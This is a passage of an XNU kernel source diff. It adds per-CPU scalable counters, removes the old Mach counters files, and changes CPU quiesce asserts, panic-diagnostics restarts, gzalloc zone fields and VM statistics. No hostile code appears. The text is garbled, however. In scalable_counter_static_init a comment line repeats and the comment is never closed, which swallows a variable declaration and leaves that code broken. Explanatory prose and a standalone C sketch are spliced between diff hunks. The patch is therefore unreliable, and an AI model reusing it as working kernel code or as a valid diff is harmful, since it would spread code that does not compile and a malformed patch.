+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <kern/assert.h>
+#include <kern/cpu_data.h>
+#include <kern/counter.h>
+#include <kern/zalloc.h>
+#include <machine/atomic.h>
+#include <machine/machine_routines.h>
+#include <machine/cpu_number.h>
+
+SECURITY_READ_ONLY_LATE(zone_t) counters_zone;
+ZONE_INIT(&counters_zone, "per_cpu_counters", sizeof(uint64_t),
+    ZC_PERCPU | ZC_ALIGNMENT_REQUIRED, ZONE_ID_ANY, NULL);
+
+/*
+ * Tracks how many static scalable counters are in use since they won't show up
+ * in the per_cpu_counters zone stats.
+ */
+uint64_t num_static_scalable_counters;
+
+/*
+ * Mangle the given scalable_counter_t so that it points to the early storage
+ * regardless of which CPU # we're boot on.
+ * Must be run before we go multi-core.
+ */
+__startup_func void
+scalable_counter_static_boot_mangle(scalable_counter_t *counter)
+{
+       *counter = __zpcpu_mangle_for_boot(*counter);
+}
+
+/*
+ * Initializes a static counter in permanent per-cpu memory.
+ * Run during startup for each static per-cpu counter.
+ * Must be run before we go multi-core.
+ */
+__startup_func void
+scalable_counter_static_init(scalable_counter_t *counter)
+{
+       /*
+        * We pointed the counter to a single global value during early boot.
+        * Grab that value now. We'll store it in our current CPU's value
+        * Grab that value now. We'll store it in our current CPU's value.
+       uint64_t current_value = os_atomic_load_wide(zpercpu_get(*counter), relaxed);
+       /*
+        * This counter can't be freed so we allocate it out of the permanent zone rather than
+        * our counter zone.
+        */
+       *counter = zalloc_percpu_permanent(sizeof(uint64_t), ZALIGN_64);
+       os_atomic_store_wide(zpercpu_get(*counter), current_value, relaxed);
+       num_static_scalable_counters++;
+}
+
+OS_OVERLOADABLE
+void
+counter_alloc(scalable_counter_t *counter)
+{
+       *counter = zalloc_percpu(counters_zone, Z_WAITOK | Z_ZERO | Z_NOFAIL);
+}
+
+OS_OVERLOADABLE
+void
+counter_alloc(atomic_counter_t *counter)
+{
+       os_atomic_store_wide(counter, 0, relaxed);
+}
+
+OS_OVERLOADABLE
+void
+counter_free(scalable_counter_t *counter)
+{
+       zfree_percpu(counters_zone, *counter);
+}
+
+OS_OVERLOADABLE
+void
+counter_free(atomic_counter_t *counter)
+{
+       (void)counter;
+}
+
+OS_OVERLOADABLE
+void
+counter_add(atomic_counter_t *counter, uint64_t amount)
+{
+       os_atomic_add(counter, amount, relaxed);
+}
+
+OS_OVERLOADABLE
+void
+counter_inc(atomic_counter_t *counter)
+{
+       os_atomic_inc(counter, relaxed);
+}
+
+OS_OVERLOADABLE
+void
+counter_dec(atomic_counter_t *counter)
+{
+       os_atomic_dec(counter, relaxed);
+}
+
+OS_OVERLOADABLE
+void
+counter_add_preemption_disabled(atomic_counter_t *counter, uint64_t amount)
+{
+       counter_add(counter, amount);
+}
+
+OS_OVERLOADABLE
+void
+counter_inc_preemption_disabled(atomic_counter_t *counter)
+{
+       counter_inc(counter);
+}
+
+OS_OVERLOADABLE
+void
+counter_dec_preemption_disabled(atomic_counter_t *counter)
+{
+       counter_dec(counter);
+}
+
+OS_OVERLOADABLE
+uint64_t
+counter_load(atomic_counter_t *counter)
+{
+       return os_atomic_load_wide(counter, relaxed);
+}
+
+OS_OVERLOADABLE
+uint64_t
+counter_load(scalable_counter_t *counter)
+{
+       uint64_t value = 0;
+       zpercpu_foreach(it, *counter) {
+               value += os_atomic_load_wide(it, relaxed);
+       }
+       return value;
+}
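counter_load() for the scalable flavor pays the read-side cost by summing every per-CPU slot, while writers only touch their own slot with relaxed atomics. A standalone C11 sketch of that shape, with a fixed slot array standing in for the zalloc_percpu storage:

#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>

#define NSLOTS 4    /* hypothetical CPU count; the kernel sizes this per-CPU */

typedef struct {
    _Atomic uint64_t slot[NSLOTS];
} scalable_counter_sketch_t;

/* Writers add to their own slot with a relaxed atomic, avoiding contention. */
static void
sketch_add(scalable_counter_sketch_t *c, unsigned self, uint64_t amount)
{
    atomic_fetch_add_explicit(&c->slot[self % NSLOTS], amount, memory_order_relaxed);
}

/* Readers sum every slot, the analogue of counter_load() above. */
static uint64_t
sketch_load(scalable_counter_sketch_t *c)
{
    uint64_t value = 0;
    for (unsigned i = 0; i < NSLOTS; i++) {
        value += atomic_load_explicit(&c->slot[i], memory_order_relaxed);
    }
    return value;
}

int main(void)
{
    scalable_counter_sketch_t c = { { 0 } };

    sketch_add(&c, 0, 1);
    sketch_add(&c, 3, 2);
    printf("total = %llu\n", (unsigned long long)sketch_load(&c));   /* total = 3 */
    return 0;
}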
diff --git a/osfmk/kern/counters.c b/osfmk/kern/counters.c
deleted file mode 100644 (file)
index 2e56e41..0000000
+++ /dev/null
@@ -1,108 +0,0 @@
-/*
- * Copyright (c) 2000-2007 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-/*
- * @OSF_COPYRIGHT@
- */
-/*
- * Mach Operating System
- * Copyright (c) 1991,1990,1989,1988,1987 Carnegie Mellon University
- * All Rights Reserved.
- *
- * Permission to use, copy, modify and distribute this software and its
- * documentation is hereby granted, provided that both the copyright
- * notice and this permission notice appear in all copies of the
- * software, derivative works or modified versions, and any portions
- * thereof, and that both notices appear in supporting documentation.
- *
- * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS"
- * CONDITION.  CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR
- * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE.
- *
- * Carnegie Mellon requests users of this software to return to
- *
- *  Software Distribution Coordinator  or  Software.Distribution@CS.CMU.EDU
- *  School of Computer Science
- *  Carnegie Mellon University
- *  Pittsburgh PA 15213-3890
- *
- * any improvements or extensions that they make and grant Carnegie Mellon
- * the rights to redistribute these changes.
- */
-/*
- */
-
-#include <mach_counters.h>
-
-#include <kern/counters.h>
-
-/*
- *     We explicitly initialize the counters to make
- *     them contiguous in the kernel's data space.
- *     This makes them easier to examine with ddb.
- */
-
-#if     MACH_COUNTERS
-mach_counter_t c_action_thread_block = 0;
-mach_counter_t c_ast_taken_block = 0;
-mach_counter_t c_dev_io_blocks = 0;
-mach_counter_t c_dev_io_tries = 0;
-mach_counter_t c_idle_thread_block = 0;
-mach_counter_t c_idle_thread_handoff = 0;
-mach_counter_t c_incoming_interrupts = 0;
-mach_counter_t c_io_done_thread_block = 0;
-mach_counter_t c_ipc_mqueue_receive_block_kernel = 0;
-mach_counter_t c_ipc_mqueue_receive_block_user = 0;
-mach_counter_t c_ipc_mqueue_send_block = 0;
-mach_counter_t c_net_thread_block = 0;
-mach_counter_t c_reaper_thread_block = 0;
-mach_counter_t c_sched_thread_block = 0;
-mach_counter_t c_stacks_current = 0;
-mach_counter_t c_stacks_max = 0;
-mach_counter_t c_stacks_min = 0;
-mach_counter_t c_swtch_block = 0;
-mach_counter_t c_swtch_pri_block = 0;
-mach_counter_t c_syscalls_unix = 0;
-mach_counter_t c_syscalls_mach = 0;
-mach_counter_t c_thread_invoke_csw = 0;
-mach_counter_t c_thread_invoke_hits = 0;
-mach_counter_t c_thread_invoke_misses = 0;
-mach_counter_t c_thread_invoke_same = 0;
-mach_counter_t c_thread_invoke_same_cont = 0;
-mach_counter_t c_thread_switch_block = 0;
-mach_counter_t c_thread_switch_handoff = 0;
-mach_counter_t c_vm_fault_page_block_backoff_kernel = 0;
-mach_counter_t c_vm_fault_page_block_busy_kernel = 0;
-mach_counter_t c_vm_map_simplified = 0;
-mach_counter_t c_vm_map_simplify_called = 0;
-mach_counter_t c_vm_map_simplify_entry_called = 0;
-mach_counter_t c_vm_page_wait_block = 0;
-mach_counter_t c_vm_pageout_block = 0;
-mach_counter_t c_vm_pageout_scan_block = 0;
-mach_counter_t c_vm_fault_retry_on_w_prot = 0;
-mach_counter_t c_vm_fault_wait_on_unlock = 0;
-#endif  /* MACH_COUNTERS */
diff --git a/osfmk/kern/counters.h b/osfmk/kern/counters.h
deleted file mode 100644 (file)
index e0f9aae..0000000
+++ /dev/null
@@ -1,133 +0,0 @@
-/*
- * Copyright (c) 2000-2007 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-/*
- * @OSF_COPYRIGHT@
- */
-/*
- * Mach Operating System
- * Copyright (c) 1991,1990,1989,1988,1987 Carnegie Mellon University
- * All Rights Reserved.
- *
- * Permission to use, copy, modify and distribute this software and its
- * documentation is hereby granted, provided that both the copyright
- * notice and this permission notice appear in all copies of the
- * software, derivative works or modified versions, and any portions
- * thereof, and that both notices appear in supporting documentation.
- *
- * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS"
- * CONDITION.  CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR
- * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE.
- *
- * Carnegie Mellon requests users of this software to return to
- *
- *  Software Distribution Coordinator  or  Software.Distribution@CS.CMU.EDU
- *  School of Computer Science
- *  Carnegie Mellon University
- *  Pittsburgh PA 15213-3890
- *
- * any improvements or extensions that they make and grant Carnegie Mellon
- * the rights to redistribute these changes.
- */
-/*
- */
-
-#ifndef _KERN_COUNTERS_
-#define _KERN_COUNTERS_
-
-#include <mach_counters.h>
-
-/*
- *     We can count various interesting events and paths.
- *
- *     Use counter() to change the counters, eg:
- *             counter(c_idle_thread_block++);
- *     Use counter_always() for non-conditional counters.
- */
-
-#define counter_always(code)    code
-
-#if     MACH_COUNTERS
-
-#define counter(code)           counter_always(code)
-
-#else   /* MACH_COUNTERS */
-
-#define counter(code)
-
-#endif  /* MACH_COUNTERS */
-
-/*
- *     We define the counters with individual integers,
- *     instead of a big structure, so that ddb
- *     will know the addresses of the counters.
- */
-
-typedef unsigned int mach_counter_t;
-
-#if     MACH_COUNTERS
-extern mach_counter_t c_action_thread_block;
-extern mach_counter_t c_ast_taken_block;
-extern mach_counter_t c_dev_io_blocks;
-extern mach_counter_t c_dev_io_tries;
-extern mach_counter_t c_idle_thread_block;
-extern mach_counter_t c_idle_thread_handoff;
-extern mach_counter_t c_incoming_interrupts;
-extern mach_counter_t c_io_done_thread_block;
-extern mach_counter_t c_ipc_mqueue_receive_block_kernel;
-extern mach_counter_t c_ipc_mqueue_receive_block_user;
-extern mach_counter_t c_ipc_mqueue_send_block;
-extern mach_counter_t c_net_thread_block;
-extern mach_counter_t c_reaper_thread_block;
-extern mach_counter_t c_sched_thread_block;
-extern mach_counter_t c_stacks_current;
-extern mach_counter_t c_stacks_max;
-extern mach_counter_t c_stacks_min;
-extern mach_counter_t c_swtch_block;
-extern mach_counter_t c_swtch_pri_block;
-extern mach_counter_t c_syscalls_unix;
-extern mach_counter_t c_syscalls_mach;
-extern mach_counter_t c_thread_invoke_csw;
-extern mach_counter_t c_thread_invoke_same;
-extern mach_counter_t c_thread_invoke_same_cont;
-extern mach_counter_t c_thread_invoke_misses;
-extern mach_counter_t c_thread_invoke_hits;
-extern mach_counter_t c_thread_switch_block;
-extern mach_counter_t c_thread_switch_handoff;
-extern mach_counter_t c_vm_fault_page_block_backoff_kernel;
-extern mach_counter_t c_vm_fault_page_block_busy_kernel;
-extern mach_counter_t c_vm_fault_retry_on_w_prot;
-extern mach_counter_t c_vm_fault_wait_on_unlock;
-extern mach_counter_t c_vm_map_simplified;
-extern mach_counter_t c_vm_map_simplify_called;
-extern mach_counter_t c_vm_map_simplify_entry_called;
-extern mach_counter_t c_vm_page_wait_block;
-extern mach_counter_t c_vm_pageout_block;
-extern mach_counter_t c_vm_pageout_scan_block;
-#endif  /* MACH_COUNTERS */
-
-#endif  /* _KERN_COUNTERS_ */
index 2ca5f67f0ac3bc28e4ebec22ee2f971d8b600c40..7c613b5c623818da56d8b29ce99e456f97d6e6d9 100644 (file)
@@ -90,16 +90,17 @@ static uint64_t cpu_checkin_min_interval;
 static uint32_t cpu_checkin_min_interval_us;
 
 #if __LP64__
-static_assert(MAX_CPUS <= 32);
-#define CPU_CHECKIN_MASK        0x5555555555555555UL
-#define CPU_EXPECTED_MASK       (~CPU_CHECKIN_MASK)
+#define CPU_CHECKIN_MASK_MAX_CPUS 32
+#define CPU_CHECKIN_MASK          0x5555555555555555UL
+#define CPU_EXPECTED_MASK         (~CPU_CHECKIN_MASK)
 #else
 /* Avoid double-wide CAS on 32-bit platforms by using a 32-bit state and mask */
-static_assert(MAX_CPUS <= 16);
-#define CPU_CHECKIN_MASK        0x55555555UL
-#define CPU_EXPECTED_MASK       (~CPU_CHECKIN_MASK)
+#define CPU_CHECKIN_MASK_MAX_CPUS 16
+#define CPU_CHECKIN_MASK          0x55555555UL
+#define CPU_EXPECTED_MASK         (~CPU_CHECKIN_MASK)
 #endif
 
+static_assert(MAX_CPUS <= CPU_CHECKIN_MASK_MAX_CPUS);
 static_assert(CPU_CHECKIN_MASK == CPU_EXPECTED_MASK >> 1);
 
 static inline checkin_mask_t
@@ -117,10 +118,10 @@ cpu_expected_bit(int cpuid)
 void
 cpu_quiescent_counter_init(void)
 {
-       assert(CPU_CHECKIN_MASK & cpu_checked_in_bit(MAX_CPUS));
-       assert(CPU_EXPECTED_MASK & cpu_expected_bit(MAX_CPUS));
-       assert((CPU_CHECKIN_MASK & cpu_expected_bit(MAX_CPUS)) == 0);
-       assert((CPU_EXPECTED_MASK & cpu_checked_in_bit(MAX_CPUS)) == 0);
+       assert(CPU_CHECKIN_MASK & cpu_checked_in_bit(MAX_CPUS - 1));
+       assert(CPU_EXPECTED_MASK & cpu_expected_bit(MAX_CPUS - 1));
+       assert((CPU_CHECKIN_MASK & cpu_expected_bit(MAX_CPUS - 1)) == 0);
+       assert((CPU_EXPECTED_MASK & cpu_checked_in_bit(MAX_CPUS - 1)) == 0);
 
        cpu_quiescent_counter_set_min_interval_us(CPU_CHECKIN_MIN_INTERVAL_US);
 }
@@ -192,6 +193,7 @@ cpu_quiescent_counter_join(__unused uint64_t ctime)
        struct cpu_quiesce *st = PERCPU_GET(cpu_quiesce);
        __assert_only int cpuid = cpu_number();
 
+       assert(cpuid < MAX_CPUS);
        assert(st->state == CPU_QUIESCE_COUNTER_NONE ||
            st->state == CPU_QUIESCE_COUNTER_LEFT);
 
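With the interleaved masks, each CPU owns an adjacent bit pair: assuming the checked-in bit sits at position 2*cpuid and the expected bit at 2*cpuid + 1 (consistent with the 0x5555... pattern), a 64-bit state word covers at most 32 CPUs, so the highest valid argument to the bit helpers is MAX_CPUS - 1, which is what the adjusted asserts now use. A small sketch checking those invariants:

#include <assert.h>
#include <stdint.h>

#define CPU_CHECKIN_MASK    0x5555555555555555ULL   /* even bits: checked in */
#define CPU_EXPECTED_MASK   (~CPU_CHECKIN_MASK)     /* odd bits: expected    */
#define SKETCH_MAX_CPUS     32                      /* 64 bits / 2 per CPU   */

static inline uint64_t sketch_checked_in_bit(int cpuid) { return 1ULL << (2 * cpuid); }
static inline uint64_t sketch_expected_bit(int cpuid)   { return 1ULL << (2 * cpuid + 1); }

int main(void)
{
    int last = SKETCH_MAX_CPUS - 1;    /* MAX_CPUS itself would shift past bit 63 */

    assert(CPU_CHECKIN_MASK  & sketch_checked_in_bit(last));
    assert(CPU_EXPECTED_MASK & sketch_expected_bit(last));
    assert((CPU_CHECKIN_MASK  & sketch_expected_bit(last)) == 0);
    assert((CPU_EXPECTED_MASK & sketch_checked_in_bit(last)) == 0);
    return 0;
}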
index 0cb5ea8100ecc045e1652c0cbb8dee6a0b08d38d..fcb23e1f7facff8a2aa0fa1d88b519578e928b50 100644 (file)
@@ -1058,7 +1058,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
         * conventional sense.
         */
        if (debugger_current_op == DBOP_PANIC || ((debugger_current_op == DBOP_DEBUGGER) && debugger_is_panic))
-#endif
+#endif /* __x86_64__ */
        {
                kdp_callouts(KDP_EVENT_PANICLOG);
 
@@ -1075,6 +1075,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
 
                /* DEBUGGER_OPTION_PANICLOGANDREBOOT is used for two finger resets on embedded so we get a paniclog */
                if (debugger_panic_options & DEBUGGER_OPTION_PANICLOGANDREBOOT) {
+                       PEHaltRestart(kPEPanicDiagnosticsDone);
                        PEHaltRestart(kPEPanicRestartCPUNoCallouts);
                }
        }
@@ -1087,6 +1088,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
         */
        if ((debugger_panic_options & DEBUGGER_OPTION_SKIP_LOCAL_COREDUMP) &&
            (debug_boot_arg & DB_REBOOT_POST_CORE)) {
+               PEHaltRestart(kPEPanicDiagnosticsDone);
                kdp_machine_reboot_type(kPEPanicRestartCPU, debugger_panic_options);
        }
 
@@ -1097,7 +1099,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
        if (on_device_corefile_enabled()) {
                if (!kdp_has_polled_corefile()) {
                        if (debug_boot_arg & (DB_KERN_DUMP_ON_PANIC | DB_KERN_DUMP_ON_NMI)) {
-                               paniclog_append_noflush("skipping local kernel core because core file could not be opened prior to panic (error : 0x%x)",
+                               paniclog_append_noflush("skipping local kernel core because core file could not be opened prior to panic (error : 0x%x)\n",
                                    kdp_polled_corefile_error());
 #if defined(__arm__) || defined(__arm64__)
                                panic_info->eph_panic_flags |= EMBEDDED_PANIC_HEADER_FLAG_COREDUMP_FAILED;
@@ -1112,7 +1114,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
                }
 #if XNU_MONITOR
                else if ((pmap_get_cpu_data()->ppl_state == PPL_STATE_PANIC) && (debug_boot_arg & (DB_KERN_DUMP_ON_PANIC | DB_KERN_DUMP_ON_NMI))) {
-                       paniclog_append_noflush("skipping local kernel core because the PPL is in PANIC state");
+                       paniclog_append_noflush("skipping local kernel core because the PPL is in PANIC state\n");
                        panic_info->eph_panic_flags |= EMBEDDED_PANIC_HEADER_FLAG_COREDUMP_FAILED;
                        paniclog_flush();
                }
@@ -1145,11 +1147,17 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
                         */
                        if ((debug_boot_arg & DB_REBOOT_POST_CORE) &&
                            ((ret == 0) || (debugger_panic_options & DEBUGGER_OPTION_ATTEMPTCOREDUMPANDREBOOT))) {
+                               PEHaltRestart(kPEPanicDiagnosticsDone);
                                kdp_machine_reboot_type(kPEPanicRestartCPU, debugger_panic_options);
                        }
                }
        }
 
+       if (debugger_current_op == DBOP_PANIC ||
+           ((debugger_current_op == DBOP_DEBUGGER) && debugger_is_panic)) {
+               PEHaltRestart(kPEPanicDiagnosticsDone);
+       }
+
        if (debug_boot_arg & DB_REBOOT_ALWAYS) {
                kdp_machine_reboot_type(kPEPanicRestartCPU, debugger_panic_options);
        }
@@ -1179,6 +1187,11 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
                panic_spin_shmcon();
        }
 #endif /* defined(__arm__) || defined(__arm64__) */
+
+#else /* CONFIG_KDP_INTERACTIVE_DEBUGGING */
+
+       PEHaltRestart(kPEPanicDiagnosticsDone);
+
 #endif /* CONFIG_KDP_INTERACTIVE_DEBUGGING */
 
        if (!panicDebugging) {
@@ -1565,10 +1578,6 @@ extern unsigned int     inuse_ptepages_count;
 extern long long alloc_ptepages_count;
 #endif
 
-extern boolean_t panic_include_zprint;
-extern mach_memory_info_t *panic_kext_memory_info;
-extern vm_size_t panic_kext_memory_size;
-
 __private_extern__ void
 panic_display_zprint(void)
 {
@@ -1579,10 +1588,10 @@ panic_display_zprint(void)
                zone_index_foreach(i) {
                        if (ml_nofault_copy((vm_offset_t)&zone_array[i],
                            (vm_offset_t)&zone_copy, sizeof(struct zone)) == sizeof(struct zone)) {
-                               if (zone_copy.page_count > atop(1024 * 1024)) {
+                               if (zone_copy.z_wired_cur > atop(1024 * 1024)) {
                                        paniclog_append_noflush("%-8s%-20s %10llu %10lu\n",
                                            zone_heap_name(&zone_copy),
-                                           zone_copy.z_name, ptoa_64(zone_copy.page_count),
+                                           zone_copy.z_name, (uint64_t)zone_size_wired(&zone_copy),
                                            (uintptr_t)zone_size_free(&zone_copy));
                                }
                        }
@@ -1623,8 +1632,6 @@ panic_display_ecc_errors(void)
 #endif /* CONFIG_ECC_LOGGING */
 
 #if CONFIG_ZLEAKS
-extern boolean_t        panic_include_ztrace;
-extern struct ztrace* top_ztrace;
 void panic_print_symbol_name(vm_address_t search);
 
 /*
index fe3d5eed2e0d069209356daae34b081cf858b538..c9550cfd7e45124e053528c540fc30bb9795c7d1 100644 (file)
@@ -286,6 +286,7 @@ __options_decl(microstackshot_flags_t, uint32_t, {
 #define KF_INTERRUPT_MASKED_DEBUG_OVRD (0x40)
 #define KF_TRAPTRACE_OVRD (0x80)
 #define KF_IOTRACE_OVRD (0x100)
+#define KF_INTERRUPT_MASKED_DEBUG_STACKSHOT_OVRD (0x200)
 
 boolean_t kern_feature_override(uint32_t fmask);
 
index 91c688db5899675cd2a82cf311af6d5bf2923faa..2060dc2a15b31d35ee0971884d66a1a80712c57a 100644 (file)
@@ -76,7 +76,6 @@
 #include <ipc/ipc_pset.h>
 #include <ipc/ipc_machdep.h>
 
-#include <kern/counters.h>
 #include <kern/ipc_tt.h>
 #include <kern/task.h>
 #include <kern/thread.h>
index ff7dec6bcddc781e46f3ebddb61674ad90e60a4b..54ec12be25c702b806c247de3ff9dc7fa2f79cf5 100644 (file)
@@ -204,11 +204,11 @@ gzalloc_empty_free_cache(zone_t zone)
        }
 
        /* Reset gzalloc_data. */
-       lock_zone(zone);
+       zone_lock(zone);
        memcpy((void *)gzfc_copy, (void *)zone->gz.gzfc, gzfcsz);
        bzero((void *)zone->gz.gzfc, gzfcsz);
        zone->gz.gzfc_index = 0;
-       unlock_zone(zone);
+       zone_unlock(zone);
 
        /* Free up all the cached elements. */
        for (uint32_t index = 0; index < gzfc_size; index++) {
@@ -233,10 +233,10 @@ gzalloc_empty_free_cache(zone_t zone)
         */
 
        /* Decrement zone counters. */
-       lock_zone(zone);
-       zone->countfree += freed_elements;
-       zone->page_count -= freed_elements;
-       unlock_zone(zone);
+       zone_lock(zone);
+       zone->z_elems_free += freed_elements;
+       zone->z_wired_cur -= freed_elements;
+       zone_unlock(zone);
 
        kmem_free(kernel_map, gzfc_copy, gzfcsz);
 }
@@ -357,6 +357,7 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
        vm_offset_t residue = rounded_size - zone_elem_size(zone);
        vm_offset_t gzaddr = 0;
        gzhdr_t *gzh, *gzhcopy = NULL;
+       bool new_va = false;
 
        if (!kmem_ready || (vm_page_zone == ZONE_NULL)) {
                /* Early allocations are supplied directly from the
@@ -381,6 +382,7 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
                        panic("gzalloc: kernel_memory_allocate for size 0x%llx failed with %d",
                            (uint64_t)rounded_size, kr);
                }
+               new_va = true;
        }
 
        if (gzalloc_uf_mode) {
@@ -396,7 +398,7 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
                addr = (gzaddr + residue);
        }
 
-       if (zone->zfree_clear_mem) {
+       if (zone->z_free_zeroes) {
                bzero((void *)gzaddr, rounded_size);
        } else {
                /* Fill with a pattern on allocation to trap uninitialized
@@ -424,15 +426,15 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
                *gzhcopy = *gzh;
        }
 
-       lock_zone(zone);
+       zone_lock(zone);
        assert(zone->z_self == zone);
-       zone->countfree--;
-       zone->page_count += 1;
+       zone->z_elems_free--;
+       if (new_va) {
+               zone->z_va_cur += 1;
+       }
+       zone->z_wired_cur += 1;
        zpercpu_get(zstats)->zs_mem_allocated += rounded_size;
-#if ZALLOC_DETAILED_STATS
-       zpercpu_get(zstats)->zs_mem_wasted += rounded_size - zone_elem_size(zone);
-#endif /* ZALLOC_DETAILED_STATS */
-       unlock_zone(zone);
+       zone_unlock(zone);
 
        OSAddAtomic64((SInt32) rounded_size, &gzalloc_allocated);
        OSAddAtomic64((SInt32) (rounded_size - zone_elem_size(zone)), &gzalloc_wasted);
@@ -468,7 +470,7 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr)
        }
 
        if (gzfc_size && gzalloc_dfree_check) {
-               lock_zone(zone);
+               zone_lock(zone);
                assert(zone->z_self == zone);
                for (uint32_t gd = 0; gd < gzfc_size; gd++) {
                        if (zone->gz.gzfc[gd] != saddr) {
@@ -478,7 +480,7 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr)
                            "current free cache index: %d, freed index: %d",
                            __func__, saddr, zone->gz.gzfc_index, gd);
                }
-               unlock_zone(zone);
+               zone_unlock(zone);
        }
 
        if (gzalloc_consistency_checks) {
@@ -549,7 +551,7 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr)
                free_addr = saddr;
        }
 
-       lock_zone(zone);
+       zone_lock(zone);
        assert(zone->z_self == zone);
 
        /* Insert newly freed element into the protected free element
@@ -564,12 +566,12 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr)
        }
 
        if (free_addr) {
-               zone->countfree++;
-               zone->page_count -= 1;
+               zone->z_elems_free++;
+               zone->z_wired_cur -= 1;
        }
 
        zpercpu_get(zstats)->zs_mem_freed += rounded_size;
-       unlock_zone(zone);
+       zone_unlock(zone);
 
        if (free_addr) {
                // TODO: consider using physical reads to check for
index 5b60219f7d3ec52c9ed02537129d0a396c8478e5..12a061aa5ab610778412bfc994b9365acf14a978 100644 (file)
 
 #include <pexpert/pexpert.h>
 
-vm_statistics64_data_t PERCPU_DATA(vm_stat);
-uint64_t PERCPU_DATA(vm_page_grab_count);
+SCALABLE_COUNTER_DEFINE(vm_statistics_zero_fill_count);        /* # of zero fill pages */
+SCALABLE_COUNTER_DEFINE(vm_statistics_reactivations);          /* # of pages reactivated */
+SCALABLE_COUNTER_DEFINE(vm_statistics_pageins);                /* # of pageins */
+SCALABLE_COUNTER_DEFINE(vm_statistics_pageouts);               /* # of pageouts */
+SCALABLE_COUNTER_DEFINE(vm_statistics_faults);                 /* # of faults */
+SCALABLE_COUNTER_DEFINE(vm_statistics_cow_faults);             /* # of copy-on-writes */
+SCALABLE_COUNTER_DEFINE(vm_statistics_lookups);                /* object cache lookups */
+SCALABLE_COUNTER_DEFINE(vm_statistics_hits);                   /* object cache hits */
+SCALABLE_COUNTER_DEFINE(vm_statistics_purges);                 /* # of pages purged */
+SCALABLE_COUNTER_DEFINE(vm_statistics_decompressions);         /* # of pages decompressed */
+SCALABLE_COUNTER_DEFINE(vm_statistics_compressions);           /* # of pages compressed */
+SCALABLE_COUNTER_DEFINE(vm_statistics_swapins);                /* # of pages swapped in (via compression segments) */
+SCALABLE_COUNTER_DEFINE(vm_statistics_swapouts);               /* # of pages swapped out (via compression segments) */
+SCALABLE_COUNTER_DEFINE(vm_statistics_total_uncompressed_pages_in_compressor); /* # of pages (uncompressed) held within the compressor. */
+SCALABLE_COUNTER_DEFINE(vm_page_grab_count);
 
 host_data_t realhost;
 
+static void
+get_host_vm_stats(vm_statistics64_t out)
+{
+       out->zero_fill_count = counter_load(&vm_statistics_zero_fill_count);
+       out->reactivations = counter_load(&vm_statistics_reactivations);
+       out->pageins = counter_load(&vm_statistics_pageins);
